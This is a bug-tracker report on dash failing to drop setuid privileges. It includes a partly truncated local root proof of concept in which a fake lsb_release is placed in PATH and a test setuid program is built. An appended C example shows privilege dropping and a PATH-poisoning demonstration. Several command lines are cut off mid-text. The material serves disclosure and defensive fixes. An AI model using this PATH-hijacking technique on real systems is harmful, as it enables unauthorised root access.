dash does not drop privileges when euid != uid; this can cause local root exploits when setuid programs use system() or popen()
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
dash (Debian) | Fix Released | Unknown | |
dash (Ubuntu) | Fix Released | High | Marc Deslauriers |
Bug Description
Poorly written setuid programs may call 'popen' or 'system' with incorrectly specified arguments. For instance, there is a bug in vmware-mount where it calls "popen(
Now, bash has a 'privdrop' option; however, Debian removed this option in the 1990s:
http://
http://
Most shells will drop privs when euid != uid, because it turns out calling popen / system from setuid scripts is nearly impossible to get right (in fact, pretty much any setuid script is insanely difficult to write without a vulnerability in it).
Ensure /bin/sh is dash
antarus@goats5 ~ $ sudo ln -sf /bin/dash /bin/sh
antarus@goats5 ~ $ cc -xc - -olsb_release<
# whoami
root
If we switched to a sane shell (like busybox, for example):
antarus@goats5 ~ $ sudo ln -sf /bin/busybox /bin/sh
antarus@goats5 ~ $ cc -xc - -olsb_release<
BusyBox v1.18.5 (Ubuntu 1:1.18.
Enter 'help' for a list of built-in commands.
/usr/local/
whoami: unknown uid XXXXX # I have omitted my actual UID, needless to say it isn't uid 0 :)
Now you may be saying 'hey i don't have vmware-mount handy' so instead:
antarus@goats5 ~ $ cat /tmp/silly_setuid.c
#include <stdio.h>
int main(int argc, char ** argv) {
popen(
}
antarus@goats5 ~ $ gcc /tmp/silly_setuid.c -o silly_setuid
antarus@goats5 ~ $ sudo chown root:root silly_setuid
[sudo] password for antarus:
antarus@goats5 ~ $ sudo chmod 4755 silly_setuid
antarus@goats5 ~ $ cc -xc - -olsb_release<
antarus@goats5 ~ $ root
Distributor ID: Ubuntu
Description: Ubuntu 12.04.1 LTS
Release: 12.04
Codename: precise
antarus@goats5 ~ $ apt-cache policy dash
dash:
Installed: 0.5.7-2ubuntu2
Candidate: 0.5.7-2ubuntu2
Version table:
*** 0.5.7-2ubuntu2 0
600 my-apt-mirror ubuntu-precise/main amd64 Packages
100 /var/lib/
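As an added example (not part of the bug report, and not dash's own patch), the two sides of the issue in C: the startup decision a privilege-aware shell makes when euid != uid, a permanent privilege drop that verifies it actually took effect, and how a setuid program can invoke a helper without handing the caller's PATH and environment to /bin/sh, next to the system()-based form the report describes. The helper path, the clean environment, the probe command and the poisoned PATH value are assumptions constructed for the demonstration, and setresuid(3)/setresgid(3) assume Linux/glibc.

```c
#define _GNU_SOURCE /* setresuid/setresgid on glibc (Linux assumed) */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* The decision a privilege-aware shell makes at startup: if it was started
 * from a setuid program (real and effective ids differ), fall back to the
 * real ids unless the caller explicitly asked to keep them (bash's -p).
 * Returns 1 when privileges must be dropped, 0 otherwise. */
int should_drop_privs(uid_t uid, uid_t euid, gid_t gid, gid_t egid,
                      int privileged_flag)
{
    if (privileged_flag)
        return 0;
    return uid != euid || gid != egid;
}

/* Permanently drop to the real uid/gid and verify that it happened.
 * Groups first (only root may change them), then the uid. setuid() can
 * fail (e.g. RLIMIT_NPROC), so the result is checked, not assumed.
 * Returns 0 on success, -1 on failure. */
int drop_privs(void)
{
    uid_t uid = getuid();
    gid_t gid = getgid();

    if (setresgid(gid, gid, gid) != 0)
        return -1;
    if (setresuid(uid, uid, uid) != 0)
        return -1;
    if (geteuid() != uid || getegid() != gid)
        return -1;
    /* The saved id must be gone too: regaining root must now fail. */
    if (uid != 0 && setuid(0) == 0)
        return -1;
    return 0;
}

/* The pattern from the report: /bin/sh resolves the command through the
 * caller's PATH and inherits the caller's whole environment, while still
 * running with the setuid program's effective uid.
 * Returns the shell's exit status, or -1 on error. */
int run_helper_via_shell(const char *cmd)
{
    int status = system(cmd);
    if (status == -1)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* The safer replacement: no shell, an absolute path, an environment built
 * from scratch, and privileges dropped in the child before exec so the
 * helper runs with the invoker's own rights. Returns the helper's exit
 * status, -1 on error, 126 if the drop failed, 127 if the exec failed. */
int run_helper(const char *abs_path, char *const argv[])
{
    static char *const clean_env[] = { "PATH=/usr/bin:/bin", NULL };
    int status;
    pid_t pid;

    if (abs_path == NULL || abs_path[0] != '/') {
        errno = EINVAL;
        return -1;
    }
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_privs() != 0)
            _exit(126);
        execve(abs_path, argv, clean_env);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Demonstration: poison PATH the way a local attacker would, then run a
 * probe (constructed for this example) that exits 0 only if it received the
 * clean PATH. The shell-based runner sees the poisoned value; run_helper
 * does not. Returns 1 if that contrast holds, 0 otherwise. */
int demo_path_poisoning(void)
{
    static char *const probe[] = {
        "sh", "-c", "test \"$PATH\" = /usr/bin:/bin", NULL
    };
    if (setenv("PATH", "/tmp/attacker-controlled", 1) != 0)
        return 0;
    int via_shell = run_helper_via_shell("test \"$PATH\" = /usr/bin:/bin");
    int via_execve = run_helper("/bin/sh", probe);
    return via_shell != 0 && via_execve == 0;
}

int main(void)
{
    printf("uid 1000 / euid 0, no -p: drop=%d\n",
           should_drop_privs(1000, 0, 1000, 0, 0));
    printf("PATH poisoning contrast holds: %d\n", demo_path_poisoning());
    return 0;
}
```

The shell fix closes the hole for the common case, but a setuid program that still reaches for popen()/system() is trusting /bin/sh to behave; the execve form above works regardless of which shell /bin/sh points at, which is the property to want in the program itself.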
Changed in dash (Ubuntu):
  status: New → Triaged
Changed in dash (Ubuntu):
  assignee: nobody → Marc Deslauriers (mdeslaur)
  importance: Undecided → High
Changed in dash (Debian):
  status: Unknown → Confirmed
Changed in dash (Debian):
  status: Confirmed → Fix Released
Tavis sent a patch to upstream dash:
http://article.gmane.org/gmane.comp.shells.dash/841